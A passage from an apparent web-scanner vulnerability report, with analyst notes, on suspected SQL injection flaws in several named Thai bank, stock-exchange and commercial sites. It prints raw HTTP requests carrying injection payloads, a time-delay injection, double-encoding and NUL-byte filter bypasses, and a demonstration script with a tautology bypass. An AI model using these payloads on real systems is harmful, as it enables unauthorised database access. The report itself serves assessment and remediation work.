Severity:   High
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter (1'=1), and a database error message was returned. Two single quotes were then submitted (1''=1) and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be IBM DB2. The quote/doubled-quote asymmetry is the classic error-based signature, and injection through a parameter name suggests that index.asp works through every query-string name rather than only the parameters it expects. Note though that the error returned, SQL30081N, is a CLI communication failure rather than a syntax error (see 1.6); repeat both requests a few times to make sure the 500 follows the quote and not the moment the database happened to be unavailable.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.asp?FileName=TH&1'=1 HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
<font face="Arial" size=2>[IBM][CLI Driver] SQL30081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected:
...[SNIP]...

Request 2

GET /index.asp?FileName=TH&1''=1 HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:25:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30024
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=GJOJLEJDCDKMIAOJMAHBHFCC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

1.8. http://register2.set.or.th/semreg/detail.aspx [cs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The cs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server; the error text (Incorrect syntax near '0049') is the SQL Server parser's, returned verbatim in the page title. The token it stumbles on, 0049, is the value of the sn parameter, which shows that ow, cs and sn are concatenated into a single statement in query-string order: the stray quote in cs closes its literal early and the parser fails at the next value along.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. That only removes the symptom, though: the statement behind detail.aspx should be built with parameterised queries (command parameters in ADO.NET) so that ow, cs and sn travel as bound values rather than as statement text. Findings 1.8, 1.9 and 1.10 are three entry points into the same statement and are fixed together.

Request 1

GET /semreg/detail.aspx?ow=FKH&cs=S0001'&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:12 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5061

<html>
<head>
<title>Line 1: Incorrect syntax near '0049'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {f
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH&cs=S0001''&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:13 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=35wddb45hxabcz45p5svc555; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.9. http://register2.set.or.th/semreg/detail.aspx [ow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The ow parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ow parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server. Here the parser fails near 'S0001', the value of the cs parameter that follows ow in the statement, consistent with the concatenation order seen in 1.8.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the message does not remove the flaw; the query should be parameterised, as described under 1.8.

Request 1

GET /semreg/detail.aspx?ow=FKH'&cs=S0001&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:35 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5066

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH''&cs=S0001&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:37 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=rw1thrzzedtfkcezq0vvrt2a; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.10. http://register2.set.or.th/semreg/detail.aspx [sn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The sn parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sn parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server. sn is the last value in the statement, so the injected quote leaves the literal open to the end of the text and the parser reports an unclosed quotation mark rather than a syntax error at a following token, completing the picture from 1.8 and 1.9.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the message does not remove the flaw; the query should be parameterised, as described under 1.8.

Request 1

GET /semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049' HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:49 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5181

<html>
<head>
<title>Unclosed quotation mark before the character string '0049' '.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049'' HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:50 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=p1nezdnp0qxygzii5le4dr45; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...
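Findings 1.7 through 1.10 all rest on the same signal: a lone quote breaks the statement, and a doubled quote (the SQL escape for a literal quote) repairs it. The script below is an added example, not code from the report or from either target. It reproduces the mechanism against an in-memory SQLite table standing in for the SQL Server and DB2 back ends (so the error text differs), with a constructed seminar table mirroring the ow, cs and sn parameters of detail.aspx, and sets the concatenating lookup beside a parameterised one that shows neither the error nor the tautology bypass.

```python
"""Added example (not from the report): the error-based signal behind findings
1.7 to 1.10, reproduced against an in-memory SQLite table.

SQLite stands in for the Microsoft SQL Server and DB2 back ends seen in the
report, so the error text differs, but the mechanism is the same: a statement
built by string concatenation fails to parse when a parameter gains a stray
single quote and parses again when the quote is doubled, while a
parameterised statement does neither.  Table, columns and row are constructed
to mirror the ow/cs/sn parameters of detail.aspx.
"""
import sqlite3
from typing import Callable, List, Tuple

BASELINE = {"ow": "FKH", "cs": "S0001", "sn": "0049"}   # values from request 1.8


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE seminar (ow TEXT, cs TEXT, sn TEXT, title TEXT)")
    conn.execute("INSERT INTO seminar VALUES ('FKH', 'S0001', '0049', 'constructed row')")
    return conn


def lookup_concatenated(conn, ow, cs, sn) -> List[Tuple]:
    """Vulnerable: the three values are pasted into the statement text."""
    sql = ("SELECT title FROM seminar WHERE ow='" + ow
           + "' AND cs='" + cs + "' AND sn='" + sn + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, ow, cs, sn) -> List[Tuple]:
    """Fixed: values travel as bound parameters and are never parsed as SQL."""
    sql = "SELECT title FROM seminar WHERE ow=? AND cs=? AND sn=?"
    return conn.execute(sql, (ow, cs, sn)).fetchall()


def probe(fn: Callable, conn, **params) -> Tuple[str, object]:
    """Run one request and classify it the way the scanner does."""
    try:
        return "ok", fn(conn, **params)
    except sqlite3.OperationalError as exc:     # parse error from the engine
        return "error", str(exc)


def scanner_pair(fn: Callable, conn, param: str) -> Tuple[str, str]:
    """Append ' and then '' to one parameter; return the two outcomes."""
    outcomes = []
    for suffix in ("'", "''"):
        params = dict(BASELINE, **{param: BASELINE[param] + suffix})
        outcomes.append(probe(fn, conn, **params)[0])
    return tuple(outcomes)


if __name__ == "__main__":
    db = make_db()
    for name in BASELINE:
        print(name, "concatenated:", scanner_pair(lookup_concatenated, db, name),
              "parameterised:", scanner_pair(lookup_parameterised, db, name))
    # With concatenation a tautology in the last parameter defeats the match;
    # with binding it is just a string that matches nothing.
    print(lookup_concatenated(db, "FKH", "S0001", "x' OR '1'='1"))
    print(lookup_parameterised(db, "FKH", "S0001", "x' OR '1'='1"))
```

For each of the three parameters the concatenated lookup yields ("error", "ok"), the pattern the report records as Confidence Certain, while the parameterised lookup yields ("ok", "ok") and simply returns no rows.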

1.11. http://www.360travelguide.com/results.asp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.360travelguide.com
Path:   /results.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle according to the scanner, but that fingerprint sits badly with the evidence. The payload is Transact-SQL: it closes a VALUES list (as if the User-Agent were being inserted into a logging table) and calls WAITFOR DELAY, which Oracle does not have. The captured response is a 301 to / carrying a full 26251-byte page, and no database error is visible in the excerpt. Treat this as unconfirmed. The useful check is a timing one: compare the elapsed time of this request with the same request carrying a 0:0:0 delay; a measurable delay would point to a Transact-SQL back end rather than Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /results.asp HTTP/1.1
Host: www.360travelguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0,0,0)waitfor%20delay'0%3a0%3a20'--
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 May 2011 13:36:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.360travelguide.com/
Content-Length: 26251
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDCCARR=CGOGAIKDIKOCGAFHKMKMPGAD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<met
...[SNIP]...
<img src='http://cache.graphicslib.viator.com/graphicslib/thumbs75/2830/SITours/bora-bora-snorkel-sharkfeeding-and-lagoonarium-full-day-tour-in-bora-bora-1.jpg' width='100px' align=left hspace='3'>
...[SNIP]...

1.12. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

Issue detail

The REST URL parameter 3 (the iBanking path segment) appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The web server decodes %2527 to %27, which passes a filter looking for a literal quote, and a second decode inside the application turns it back into '.

Note what the captured pair actually shows: Response 1 is a redirected 200 serving the site's 191605-byte SharePoint page, and Response 2 is an empty 200 (Content-Length 0) with a static ETag. Neither is a database error, and 1.13 reproduces the identical pair from a different path, which points to site-wide handling of malformed paths rather than a query specific to this segment. The Tentative confidence is appropriate.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Online%20Banking/For%20Personal/iBanking%2527/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 191605
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 13:43:24 GMT
Last-Modified: Tue, 03 May 2011 13:43:24 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:24 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HE
...[SNIP]...
<!-- Use %=TitltName% (Scrip less)technic because Share Point Design is automatic create don't want attribute and page occor error.-->
...[SNIP]...

Request 2

GET /Online%20Banking/For%20Personal/iBanking%2527%2527/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Aug 2009 19:47:17 GMT
Accept-Ranges: bytes
ETag: "8f2afb86118ca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:28 GMT
Content-Length: 0
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


1.13. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The REST URL parameter 4 (the truehitsstat.asp file-name segment) appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The response pair is byte-for-byte the one seen in 1.12 (the same 191605-byte page, then the same empty response with ETag "8f2afb86118ca1:0"), so the two findings should be verified together and most likely share one cause in the site's path handling.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /_layouts/NR/JavaScript/truehitsstat.asp%2527 HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 191605
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 13:43:07 GMT
Last-Modified: Tue, 03 May 2011 13:43:07 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:07 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HE
...[SNIP]...
<!-- Use %=TitltName% (Scrip less)technic because Share Point Design is automatic create don't want attribute and page occor error.-->
...[SNIP]...

Request 2

GET /_layouts/NR/JavaScript/truehitsstat.asp%2527%2527 HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Aug 2009 19:47:17 GMT
Accept-Ranges: bytes
ETag: "8f2afb86118ca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:10 GMT
Content-Length: 0
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


1.14. http://www.scriptlogic.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scriptlogic.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The 500 page is ASP.NET's generic "Runtime Error" screen, which carries no database fingerprint; what supports the finding is only that ' provoked it and '' did not. The site evidently records referring URLs (see the Referrer= and EntryPoint= cookies in the request), which is consistent with the header being written to a store, but an intermittent 500 would produce the same pair, so repeat both requests before relying on this.

Request 1

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
<head>
<title>Runtime Error</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: EntryPointCheck=5/3/2011 9:45:07 AM; domain=scriptlogic.com; expires=Fri, 03-Jun-2011 13:45:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1"
...[SNIP]...

1.15. http://www.set.or.th/set/images/bg-body.gif [jsessionid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.set.or.th
Path:   /set/images/bg-body.gif

Issue detail

The jsessionid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsessionid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The injection point here is the ;jsessionid= path parameter appended to a static image, which the servlet container parses for session lookup. Look at what came back: Response 1 is a 200 carrying the site's own error page (note page="Error 404" in its script), and Response 2 is Apache's bare 404 Not Found. Both are not-found outcomes; the difference is which layer rejected the path, and neither shows a database error. This is weak evidence of SQL injection.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: inspection stops at %00 while the Java application behind it reads the whole value. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51%00' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:22 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41DB11D19B3DE8B51%00'' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/oppdaybyperiod.do?language=en&country=US
Cookie: JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:59:24 GMT
Server: Apache
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /set/images/bg-body.gif;jsessionid=A22EEA66F59FADF41D
...[SNIP]...
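Findings 1.12, 1.13 and 1.15 are bypasses of a filter rather than direct injections, and both tricks (double URL-encoding, a NUL byte ahead of the blocked character) exploit the same mistake: validating the value in a form other than the one the application finally consumes. The script below is an added example, not from the report. The filter logic is an assumption about what a blocking layer in front of those targets might do, the sample inputs are the path values from the report's requests, and hardened_filter() shows the remediation the report recommends: canonicalise first, validate after.

```python
"""Added example (not from the report): why the bypasses in findings 1.12,
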